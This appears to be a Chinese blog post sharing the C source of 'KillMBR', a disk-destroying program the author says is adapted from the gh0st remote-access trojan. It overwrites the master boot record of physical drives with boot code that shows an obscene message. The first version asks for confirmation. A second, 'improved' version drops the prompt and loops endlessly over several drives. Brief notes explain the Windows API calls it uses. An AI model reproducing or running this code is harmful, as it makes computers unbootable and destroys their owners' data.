/* //KILLMBR.c 源自gh0st远控3.6版的源码中对版权保护的硬盘锁,只做了少量修改 通过这一篇文章了解 http://blog.csdn.net/qiurisuixiang/article/details/7314882 2013/7/11 by赫 */ #include "stdafx.h" int KillMBR() ; unsigned char scode[] = "xb8x12x00xcdx10xbdx18x7cxb9x18x00xb8x01x13xbbx0c" "x00xbax1dx0excdx10xe2xfex49x20x61x6dx20x48x45x20" "x46x75x63x6bx20x79x6fx75x0Dx3Cx3Cx3Cx2Bx3Ex3Ex3E"; int _tmain(int argc, _TCHAR* argv[]) { _wsetlocale(LC_ALL, L"chs"); wchar_t YesOrNo; wprintf(L"***********************************"); wprintf(L"此程序有高度危险性是否要执行? "); wprintf(L"继续请输入Y(大写),输入其他退出 "); wprintf(L"By赫"); wprintf(L"***********************************"); YesOrNo = getwchar(); if(YesOrNo == L'Y') { KillMBR(); } getwchar(); getwchar(); return 0; } int KillMBR() { HANDLE hDevice; DWORD dwBytesWritten, dwBytesReturned; BYTE pMBR[512] = {0}; // 重新构造MBR memcpy(pMBR, scode, sizeof(scode) - 1); pMBR[510] = 0x55; pMBR[511] = 0xAA; hDevice = CreateFile ( L"\\.\PHYSICALDRIVE0", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL ); if (hDevice == INVALID_HANDLE_VALUE) return -1; DeviceIoControl ( hDevice, FSCTL_LOCK_VOLUME, NULL, 0, NULL, 0, &dwBytesReturned, NULL ); // 写入病毒内容 WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL); DeviceIoControl ( hDevice, FSCTL_UNLOCK_VOLUME, NULL, 0, NULL, 0, &dwBytesReturned, NULL ); CloseHandle(hDevice); ExitProcess(-1); return 0; }
https://github.com/HeMinzhang/Hello-World/blob/master/windows/KillMBR/KillMBR.cpp 我的github
unsignedcharscode[] 第2段“x49x20x61x6dx20x48x45x20 开始为程序成功运行后,再次开机在屏幕上显示的字符
关键一点是CreateFile打开\\.\PHYSICALDRIVE0 为第一扇区,然后DeviceIoControl对设备执行操作,WriteFile写入到扇区,
DeviceIoControl再次操作
此类MBR程序,运行时对MBR进行破坏几年前就已被国内杀毒厂商拦截
因为在win7下测试无效所以我改良了程序,如下 有效,只是显示字符不正确
/* 源自gh0st远控3.6版的源码中对版权保护的硬盘锁,只做了少量修改 通过这一篇文章了解 http://blog.csdn.net/qiurisuixiang/article/details/7314882 2013/7/11 by赫 */ #include "stdafx.h" int KillMBR() ; unsigned char scode[] = "xb8x12x00xcdx10xbdx18x7cxb9x18x00xb8x01x13xbbx0c" "x00xbax1dx0excdx10xe2xfex49x20x61x6dx20x48x45x20" "x46x75x63x6bx20x79x6fx75x0Dx3Cx3Cx3Cx2Bx3Ex3Ex3E"; DWORD Sr = 10; int _tmain(int argc, _TCHAR* argv[]) { while(1) { if(Sr == 0) { Sr = 11; KillMBR(); } else if(Sr < 11) { Sr--; KillMBR(); } else { KillMBR(); Sr++; } } return 0; } int KillMBR() { HANDLE hDevice; DWORD dwBytesWritten, dwBytesReturned; BYTE pMBR[512] = {0}; wchar_t MBR_Path[128] ; // 重新构造MBR memcpy(pMBR, scode, sizeof(scode) - 1); pMBR[510] = 0x55; pMBR[511] = 0xAA; StringCchPrintf(MBR_Path,128,_T("\\.\PHYSICALDRIVE%d%c"),Sr,_T('�')); hDevice = CreateFile ( MBR_Path, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL ); if (hDevice == INVALID_HANDLE_VALUE) return -1; DeviceIoControl ( hDevice, FSCTL_LOCK_VOLUME, NULL, 0, NULL, 0, &dwBytesReturned, NULL ); // 写入病毒内容 WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL); DeviceIoControl ( hDevice, FSCTL_UNLOCK_VOLUME, NULL, 0, NULL, 0, &dwBytesReturned, NULL ); CloseHandle(hDevice); //ExitProcess(-1); return 0; }
依次读取所有扇区然后Clean之